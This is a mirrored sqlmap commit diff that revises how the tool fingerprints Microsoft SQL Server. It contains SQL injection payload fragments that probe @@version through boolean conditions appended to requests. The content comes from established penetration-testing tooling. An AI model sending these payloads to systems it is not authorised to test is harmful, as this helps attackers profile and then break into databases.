mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-03 22:31:34 +00:00
Better fingerprint technique for Microsoft SQL Server
This commit is contained in:
parent
79c8d63b88
commit
b0ad102efb
2 changed files with 5 additions and 3 deletions
|
|
@ -176,12 +176,13 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
logMsg = "testing Microsoft SQL Server"
|
||||
logger.info(logMsg)
|
||||
|
||||
randInt = str(randomInt(1))
|
||||
|
||||
payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
|
||||
payload = agent.fullPayload(" AND LEN(@@version)=LEN(@@version)")
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
if result == True:
|
||||
logMsg = "confirming Microsoft SQL Server"
|
||||
logger.info(logMsg)
|
||||
|
||||
for version in ( 0, 5, 8 ):
|
||||
payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
|
||||
result = Request.queryPage(payload)
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue